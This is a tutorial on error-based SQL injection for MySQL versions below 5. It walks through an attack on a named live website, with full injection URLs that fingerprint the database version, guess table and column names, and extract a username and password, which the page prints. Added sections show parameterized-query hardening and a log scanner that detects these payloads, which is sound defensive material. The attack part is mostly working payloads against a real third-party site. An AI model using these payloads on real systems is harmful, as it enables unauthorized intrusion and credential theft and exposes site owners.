
ERROR BASED SQL INJECTION 

Injecting site with 4 Columns

SQL INJECTION WHERE THE VERSION IS LESS THAN 5

Hello, all! Today I'm going to teach you how to inject a website that has a version less than 5. Special thanks to my dearest Luge Racer Bro.

Let's start. As an example, I'm taking this site.

http://www.ultimatehomedesign.com/news-detail.php?id=312

NOTE: Don't go ahead if you don't know UNION-based SQL injection.

Getting Version

Now, let's check the version with an error-based query.

+or+1+group+by+concat_ws(0x7e,version (),floor(rand(0)*2))+having+min(0)+or+1–

Version: Duplicate entry '4.1.22-standard~1' for key 1

Getting Tables

This site doesn't have information_schema: the version is less than 5. We have to guess the table names.

This should be our syntax to guess the tables.

or+1+group+by+concat_ws(0x7e,(select+1+from+Guess_table+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Now we have to guess the table name with this syntax. Some tables that usually contain login data:

admin, adminstator, tbl_admin, tbl_adminstator, login, member, user, users, table_users, settings

Now I'm trying to guess the table name with the syntax.

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+admin+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

I tried to guess the admin table. There is no table in the database named admin.

So an error came up:

Table 'uhd.admin' doesn't exist

Let's try to guess another table.

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+adminstator+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Again an error came up. There is no table in the database named adminstator.

So an error came up:

Table 'uhd.adminstator' doesn't exist

Let's try with another table:

http://www.ultimatehomedesign.com/news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,(select+1+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

So the users table exists.

No table error came up this time:

Duplicate entry '1~1' for key 1
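Why the table guessing above works, and what closes it, as an added example that is not part of the original page: the first handler pastes the id parameter into the SQL text and returns the database error to the client, the second validates the id, binds it as a parameter and keeps errors in the server log. SQLite stands in for MySQL 4.1 here, and the table contents, function names and messages are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed stand-in for the site's database (SQLite, not MySQL 4.1).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("CREATE TABLE users (user_name TEXT, user_pass TEXT)")
    db.execute("INSERT INTO news VALUES (312, 'Kitchen trends')")
    db.execute("INSERT INTO users VALUES ('editor', 'not-a-real-hash')")
    return db

def vulnerable_news_detail(db, raw_id):
    # Weak: the parameter becomes part of the SQL text, and the driver's
    # error message is sent back to the client.
    try:
        row = db.execute("SELECT title FROM news WHERE id = " + raw_id).fetchone()
        return row[0] if row else "Not found"
    except sqlite3.Error as exc:
        return "Database error: %s" % exc

def hardened_news_detail(db, raw_id, log):
    # 1. The id must be a plain decimal integer and nothing else.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 10):
        log.append("rejected id parameter: %r" % raw_id)
        return "Bad request"
    try:
        # 2. Bound parameter: the value is never parsed as SQL.
        row = db.execute("SELECT title FROM news WHERE id = ?",
                         (int(raw_id),)).fetchone()
        return row[0] if row else "Not found"
    except sqlite3.Error as exc:
        # 3. Details go to the server log; the client gets a fixed message.
        log.append("db error: %s" % exc)
        return "Internal error"

def demo():
    # The same kind of table probes the page uses, against both handlers.
    db, log = make_db(), []
    probes = ["312",
              "312 or (select 1 from admin limit 0,1)",
              "312 or (select 1 from users limit 0,1)"]
    return [(vulnerable_news_detail(db, p), hardened_news_detail(db, p, log))
            for p in probes]
```

The vulnerable handler answers the two probes differently (an error naming the missing table versus a normal page), which is the oracle the guessing relies on; the hardened handler gives the same "Bad request" for both.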

Getting Columns

Now, we have to guess the column name. So the syntax to get columns should be like this:

+or+1+group+by+concat_ws(0x7e,(select+column_name+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

username is the most common column name. Let's try with it.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+username+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

An error came up. The column doesn't exist :(

Unknown column 'username' in 'field list'

Let's try to guess another column, user_name.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_name+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Now the site loads fine. That means user_name exists.

Now try to guess the password column. Let's try with user_pass.

http://www.ultimatehomedesign.com/news-detail.php?id=309+or+1+group+by+concat_ws(0x7e,(select+user_pass+from+users+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Extracting data from columns

To get data from columns, our syntax should be this:

or+1+group+by+concat_ws(0x7e,(select+concat(column_name,0x7e,column_name)+from+table_name+limit+0,1),floor(rand(0)*2))+having+min(0)+or+1–

Sometimes this query doesn't work, and it doesn't work on this site. We have to use substring.

Getting Username:

http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_name,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

With this substring subquery we can build a more complex query. This query attempts to retrieve the name of a database table, one character at a time. The substring function will return the first character of the query's result.

The username comes up in the query:

Duplicate entry 'root~1' for key 1

Getting Password:

http://www.ultimatehomedesign.com/news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select(select+concat(cast(concat(substring(user_pass,1,25))+as+char),0x7e))+from+users+limit+0,1),floor(rand(0)*2))x+from+users+group+by+x)a)

Password came up:

Duplicate entry 'trump123~1' for key 1
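Every request in this walkthrough carries the same building blocks (floor(rand(0)*2), group by, having min(0), nested selects), so it is easy to spot in web server access logs. The scanner below is an added example, not part of the original page; the log lines, IP addresses and signature names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Building blocks of the error-based requests shown on this page.
SIGNATURES = {
    "rand-floor": re.compile(r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\)"),
    "group-by-concat": re.compile(r"group\s+by\s+concat"),
    "having-min": re.compile(r"having\s+min\s*\("),
    "subselect": re.compile(r"\(\s*select\b"),
}

# Constructed access-log sample (combined log format, documentation IPs).
SAMPLE_LOG = """\
198.51.100.7 - - [10/Oct/2024:13:55:36 +0000] "GET /news-detail.php?id=312 HTTP/1.1" 200 5120
203.0.113.9 - - [10/Oct/2024:13:56:01 +0000] "GET /news-detail.php?id=312+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1-- HTTP/1.1" 200 312
203.0.113.9 - - [10/Oct/2024:13:56:09 +0000] "GET /news-detail.php?id=309+and+(select+1+from+(select+count(*),concat((select+1),floor(rand(0)*2))x+from+users+group+by+x)a) HTTP/1.1" 200 298
198.51.100.7 - - [10/Oct/2024:13:57:12 +0000] "GET /search.php?q=group+by+price HTTP/1.1" 200 2048
"""

def normalize(query):
    # Undo URL encoding twice ('+', %xx, %25xx), drop /**/ comments,
    # lower-case and collapse whitespace so spacing tricks do not matter.
    text = unquote_plus(unquote_plus(query)).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def scan_line(line):
    # The request target is the token after the method in the quoted field.
    m = re.search(r'"(?:GET|POST|HEAD) (\S+)', line)
    if not m:
        return None
    query = normalize(urlsplit(m.group(1)).query)
    hits = sorted(name for name, rx in SIGNATURES.items() if rx.search(query))
    # rand-floor alone is decisive; otherwise require two weaker signals.
    if "rand-floor" in hits or len(hits) >= 2:
        return {"ip": line.split()[0], "hits": hits}
    return None

def scan_log(text):
    # Return one finding per suspicious line, in log order.
    return [f for f in map(scan_line, text.splitlines()) if f]
```

A single weak keyword such as "group by" in a search term is not flagged, which keeps ordinary traffic out of the findings.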